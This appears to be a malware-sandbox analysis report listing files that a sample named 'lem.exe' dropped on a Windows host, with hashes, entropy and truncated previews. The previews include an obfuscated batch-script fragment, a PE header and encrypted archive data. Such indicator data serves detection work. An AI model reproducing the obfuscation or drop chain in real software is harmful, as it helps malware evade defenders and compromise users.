                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMOwuF9hDO6vP6O++tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE46/tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:E5CE18B3C11C54F34E1EF7A9935A2546
                                                                                                                                                                                                                                                                                                  SHA1:B2A241D92CEE9B8CDC09D2C3D6FD72640D15D1AE
                                                                                                                                                                                                                                                                                                  SHA-256:527622992E84E8E1EA927802655AF35F3D4E1FC9D89AC60D2FAE32EA7B46D010
                                                                                                                                                                                                                                                                                                  SHA-512:2E112CC3987618C1F3038222BE1A9F8996ECB644EC054D2F43C785CDB07986A79E582561AD5B1EAB2117DC95DF8CAACB2160A668E6F1BBD600220978956F94E5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44063
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090490549036212
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMOwuF9hDO6vP6Of2tbzy70FqHoPFkGoup1Xl3jVa:z/Ps+wsI7ynE46Otbz8hu3VlXr4CRo5
                                                                                                                                                                                                                                                                                                  MD5:92264020E071F6DB6194E9B6F393F397
                                                                                                                                                                                                                                                                                                  SHA1:1C9E4E9E91ECC2399E5C5FC1EAAB5CF22C8DD914
                                                                                                                                                                                                                                                                                                  SHA-256:35E1BAEE49D0FB7D8857379BB56804AFCB315CB98509AC09057843B7721205B5
                                                                                                                                                                                                                                                                                                  SHA-512:1F023063C733DB717629615D0CC523C2F64806A08FC3998554E8C59BE9201E4582291BFB0A1203F68AAD060BE02C56E0D317F5549088A215B801BF6560998525
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44596
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.096735953059218
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBVwuwhDO6vP6O2lIY89giDPFs9XFwcGoup1Xl3jVu:z/Ps+wsI7ynEn6W/83chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:8503EFB3B0FEC700BBD5EB179C003218
                                                                                                                                                                                                                                                                                                  SHA1:A74CF29A9BFB3044D62F7EB7A13457C7F1DB4FAB
                                                                                                                                                                                                                                                                                                  SHA-256:B435356CE1710F4FF7B6E0FE5052AFC6EBCA38CD4512E83864B5F2D841B4D2FB
                                                                                                                                                                                                                                                                                                  SHA-512:CB6D770FD8C97CAF15F195F48C59EC8F896EE905BC7EB8887F34E7EAE4964E9E25404B26756CAB510ABCFCBDF7D8B446F8A6C274D6CA557AFA00A48589B882B1
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2278
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.82613732313957
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKxrgxMxl9Il8uMHRGPGEBie1jrSUlVlu3Swd1rc:mhYIRGPGreFlPbn
                                                                                                                                                                                                                                                                                                  MD5:24FA3E04BDBBCA4D92576991756B61FE
                                                                                                                                                                                                                                                                                                  SHA1:1E55B5D2700CD07B9A9FFC982ABA732EFFA7B726
                                                                                                                                                                                                                                                                                                  SHA-256:BD398E00E63285FA33CCE4863AB5EC2664B788F10B84A6F93991F2D9882E84A2
                                                                                                                                                                                                                                                                                                  SHA-512:27337AA9F933A05028B60139EC27C4BD04DE5ED56BF232141E7EFFD4BBB81C0CEB5BB2EE98ABCCE6C815D0E0E91F4EE5D8E0585E0F9D6375C6A6DDB0476474D9
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.F.C.y.J.C.1.Y.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.4.t.4.S.F.5.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4622
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.996582550968713
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:+YIAX09p3K/NSnlqj2EwMgfDfdBgNPHywqy:++KJnEwMgfJBgNaNy
                                                                                                                                                                                                                                                                                                  MD5:952A8F5EA4B1F8043C923EFBCDC816AC
                                                                                                                                                                                                                                                                                                  SHA1:9502B0F0F9F01426B3982D819AAB9EF57CE3469E
                                                                                                                                                                                                                                                                                                  SHA-256:BD1D0EEAABA223ACC81627C2F4081CB9A8088369E471D35452DD01AC2BB7EA9A
                                                                                                                                                                                                                                                                                                  SHA-512:6DBCA5087447EC32364C2FC51FAF8D85678CAF6000CE070A75E42F709C3C60E1A95F13E867E2EA63C8BD19574CC85514FA60B8E22733F95D45F9438398A63D04
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".X.U.A.3.C.i.V.Y.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.4.t.4.S.F.5.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2684
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8920008575661664
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKx68Wa7xmxl9Il8uMHdRw90sQfgizeT6Jy0x6k5arSY16OMJd/vc:asYIk0sQB8k2fQo
                                                                                                                                                                                                                                                                                                  MD5:807D3B63ABCB54A86802198F5041D12E
                                                                                                                                                                                                                                                                                                  SHA1:94C1350B103B486DB04EBC6EF9B6E086B96B9D43
                                                                                                                                                                                                                                                                                                  SHA-256:15B1E2A90D24ADDF54AE1FB83506FE5775137D73502066A7C5714A5E7D3434DC
                                                                                                                                                                                                                                                                                                  SHA-512:8AFE2DCAAB7A4333F652103BBBD7C4BDF270EF9AC444D87C4E9D6A3A414BA67CDD55E9803213A9ABF13C5AF67E41C4969ED9BFD25AD583DE529386EFC7081518
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:."./.O.J.0.O.v.Z.2.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.4.t.4.S.F.5.
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):947288
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                                                  MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                                  SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                                                  SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                                                  SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):271120
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.9993557269020155
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:6144:Gc4RvoyV4vGzMoN0npS8nqWhvoSTK4mXomqX8Ih:YRvgoN01rh5K4gqX5h
                                                                                                                                                                                                                                                                                                  MD5:37042197E6ED0CED3E18E3049135E2E5
                                                                                                                                                                                                                                                                                                  SHA1:26B16A34CB5646551C53C2CD45209F4237B06BE2
                                                                                                                                                                                                                                                                                                  SHA-256:537914B1D5A23203831B93E943BFD9C74DC117AB8D84DE22D37CA7EA2F8F8288
                                                                                                                                                                                                                                                                                                  SHA-512:588185840D638A0C6F167FCFAFCC64DC831D9E5A2A0AB69D8C8B201C4B905CA5DA412D908C1A00B50453259FD5B9DAC63C4376E086B26180B51A066BB714D51D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                                  File Type:Microsoft Cabinet archive data, 487443 bytes, 11 files, at 0x2c +A "Proceedings" +A "Recovery", ID 8198, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):487443
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.998124391538459
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:12288:B+S9oU3XWMHVIx884xmjdmLlSM7DGRgpqb7ITX:AeoUnW1xbAlSM3BpqATX
                                                                                                                                                                                                                                                                                                  MD5:3E6C9EC6F7CFD6FF9E44415233734692
                                                                                                                                                                                                                                                                                                  SHA1:C9E302D20AADC02EEF66CCB7E0562C9D5AAD1FAE
                                                                                                                                                                                                                                                                                                  SHA-256:59F56DFCFF7617579EC1940D61BF2AF6EFA6DD90D0849F9B658FF56859A118B9
                                                                                                                                                                                                                                                                                                  SHA-512:4467EDF1AEE44166B6D7356E3A4C91AF1F38C6934F06EC6C63EA778E96190061F05759C9AC2366AA364A35AFDBE1ED6478AFAFAC7A62EA9BA3CC153AA2E35518
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):68608
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.767683978790837
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:Ov2j62SfuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08Qukl6:+2jfTq8QLeAg0Fuz08X5
                                                                                                                                                                                                                                                                                                  MD5:D562AC74A5D84C5F5418FE566482E0A6
                                                                                                                                                                                                                                                                                                  SHA1:86694D56F1571999F19E56C3143680B49866DDE8
                                                                                                                                                                                                                                                                                                  SHA-256:CCBDCE2D5D2EE43E6B214CD363E32DFBE2B14A9100DE6A179BE7B3C6D4CDAF24
                                                                                                                                                                                                                                                                                                  SHA-512:1E3466B2C2D23741A0CD9DB3CC594D9529C8660AC05311708606EE9809F16D67AC2B072CF0E2D423FE02A6E867A13043400064D0860B63D0C3A0BC1E855DD62A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (944), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):25102
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.113247807478338
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:CLr7xw9jD6bo12DAZS4Mt0TuJuZ7kwsFZLfUwfZfLPX2to8rD6r:kXUjDt12s0BiuJuZIw0ZLffhfDK1r8
                                                                                                                                                                                                                                                                                                  MD5:15B3F5F2D363D4D3BC645E1261EE7E5B
                                                                                                                                                                                                                                                                                                  SHA1:AB35B1C8CB947A415C033AC8973137472C21F627
                                                                                                                                                                                                                                                                                                  SHA-256:FDED537E8EFA988E93A53FC946BA828AFCB4275A6AA1756ABCFD56F1B39A8C85
                                                                                                                                                                                                                                                                                                  SHA-512:5316C823881AD73C85F00A8C78398C485341488B36E4256C7E553AC06EDE4AA682C91AA5607D1AF5B7871C429B5519911C99D3AFE313EE5A93BF1648E814C998
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:Set Camp=9..QXipBelle-..AXEGoverning-Tex-Breed-Verification-Ethical-Doctors-..PIInvisible-..ahPMidlands-Brand-Keith-Promotion-Intervals-Orange-Chuck-..cyfJAccident-Creative-Luke-..dwWZRouter-Russell-Jill-Essays-Xhtml-Win-..mPWFoot-Assessments-Grant-..UyNChar-Marcus-Controller-Webcam-Johnson-Madrid-Pix-..Set Counseling=C..AFAutomation-Brighton-Ra-Pins-Illinois-Beside-Sharon-..ItTrouble-Interesting-Chips-Strap-Behaviour-Podcasts-Approx-..TDlChannels-Loose-Young-Lace-Weak-Parameters-..uVHZSmall-Rosa-Inner-..HxeSailing-Deviant-Hood-Conversations-Anytime-Comics-Congo-..YSChains-Subject-Lunch-Mint-Cartoon-Important-Nearest-..BJYQInvesting-Toddler-Allowing-..kCKeywords-..nPUSearches-..Set Focused=E..jOYValue-Easy-Tobacco-Desktop-Burlington-Ja-..TNpFailing-Daughter-..hiTested-Tribe-Females-Quote-Feature-Helpful-Butler-..hFNOperator-Detail-Tunisia-Tapes-Write-Election-Territory-Boob-Cooler-..KQteProbably-Maps-Graphical-Forgotten-..bIStrong-Oxygen-Ul-Novel-..OOSSThreshold-Camp-Tub-Dp-Influence-D
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (944), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):25102
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.113247807478338
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:CLr7xw9jD6bo12DAZS4Mt0TuJuZ7kwsFZLfUwfZfLPX2to8rD6r:kXUjDt12s0BiuJuZIw0ZLffhfDK1r8
                                                                                                                                                                                                                                                                                                  MD5:15B3F5F2D363D4D3BC645E1261EE7E5B
                                                                                                                                                                                                                                                                                                  SHA1:AB35B1C8CB947A415C033AC8973137472C21F627
                                                                                                                                                                                                                                                                                                  SHA-256:FDED537E8EFA988E93A53FC946BA828AFCB4275A6AA1756ABCFD56F1B39A8C85
                                                                                                                                                                                                                                                                                                  SHA-512:5316C823881AD73C85F00A8C78398C485341488B36E4256C7E553AC06EDE4AA682C91AA5607D1AF5B7871C429B5519911C99D3AFE313EE5A93BF1648E814C998
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:Set Camp=9..QXipBelle-..AXEGoverning-Tex-Breed-Verification-Ethical-Doctors-..PIInvisible-..ahPMidlands-Brand-Keith-Promotion-Intervals-Orange-Chuck-..cyfJAccident-Creative-Luke-..dwWZRouter-Russell-Jill-Essays-Xhtml-Win-..mPWFoot-Assessments-Grant-..UyNChar-Marcus-Controller-Webcam-Johnson-Madrid-Pix-..Set Counseling=C..AFAutomation-Brighton-Ra-Pins-Illinois-Beside-Sharon-..ItTrouble-Interesting-Chips-Strap-Behaviour-Podcasts-Approx-..TDlChannels-Loose-Young-Lace-Weak-Parameters-..uVHZSmall-Rosa-Inner-..HxeSailing-Deviant-Hood-Conversations-Anytime-Comics-Congo-..YSChains-Subject-Lunch-Mint-Cartoon-Important-Nearest-..BJYQInvesting-Toddler-Allowing-..kCKeywords-..nPUSearches-..Set Focused=E..jOYValue-Easy-Tobacco-Desktop-Burlington-Ja-..TNpFailing-Daughter-..hiTested-Tribe-Females-Quote-Feature-Helpful-Butler-..hFNOperator-Detail-Tunisia-Tapes-Write-Election-Territory-Boob-Cooler-..KQteProbably-Maps-Graphical-Forgotten-..bIStrong-Oxygen-Ul-Novel-..OOSSThreshold-Camp-Tub-Dp-Influence-D
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):71680
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.61321542810069
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:9iKwtk2ukC5HRu+OoQjz7nts/M26N7oKzYkBvRmLORuCYm9PrpmESA:FwS2u5hVOoQ7t8T6pUkBJR8CThpmESA
                                                                                                                                                                                                                                                                                                  MD5:21F9A0D1A89E387CD2274ABC7CE97FE8
                                                                                                                                                                                                                                                                                                  SHA1:0FD8A73629F4EAF6DA323F23F34D9CF3BD365F75
                                                                                                                                                                                                                                                                                                  SHA-256:F494D9FCC5ACD2AAF67C78F50DD42FF180563E7B5D644499C733702577E55331
                                                                                                                                                                                                                                                                                                  SHA-512:DF1162A9F13847AE11FC84D7BFB42914618D24778634E2396D5FE3AC7F26D299D183DF200F7C1594A24106BD1637BEE81F702B8BD590E617CA46A2F7C5E5132D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):727
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.101388958324534
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:SyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1:SyGS9PvCA433C+sCNC1
                                                                                                                                                                                                                                                                                                  MD5:B7AB55F71BFCD99EE591FC2293C497AA
                                                                                                                                                                                                                                                                                                  SHA1:2EC19D190A7933A11E70F4C14AA5EE11704C2BDB
                                                                                                                                                                                                                                                                                                  SHA-256:FAB67D9952658803C23ED37CB31EF8B70AE9D418641BBD9D6E48DB959D8AE51D
                                                                                                                                                                                                                                                                                                  SHA-512:FDEAEC906C8D6D468B370300BA745283158E70F38874163CB732C88AB972BAA08A9F233E346C701B81C8076E3452F97AA56739616D02313FD10F0C9F9C2BD60C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:aid........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.997961977558292
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:GiBm4AFxoREyNUV7afvNWl2CSB4w51YrYILPOZfvIix/NvQLc:GidKgNE7af1kXvoyhLWRNvx
                                                                                                                                                                                                                                                                                                  MD5:B9D283F35F6051D1583EC106DA9F1A14
                                                                                                                                                                                                                                                                                                  SHA1:D3C27BE9B09E9CEFD7AC6AE4E56F1B75B7389D63
                                                                                                                                                                                                                                                                                                  SHA-256:6AC9078BEFA65EB3BF7487C74FE921C5B424EF9E12902B59DCB9D192ED39D342
                                                                                                                                                                                                                                                                                                  SHA-512:0B5B9BBA450A9C9506569E8617964B8AFE14195932F145BB95F2BF2AD24565A18CE3F0C5E40A4D3E05768906CA96B11106AFEB7D43A81DD42FBEC83DA1D9FBAB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3500
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.399260880027048
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:6NnCSHCjNnCwbC8NnC2p9CFNnC+6NdgEC+rNnCV0lCVSNnCgDCaxNnC6PwC62Nn8:6NUNRNANZ6NbrNzNnbNlP42N8
                                                                                                                                                                                                                                                                                                  MD5:5D24CB4D11310DF0CB7F20EB171B93D2
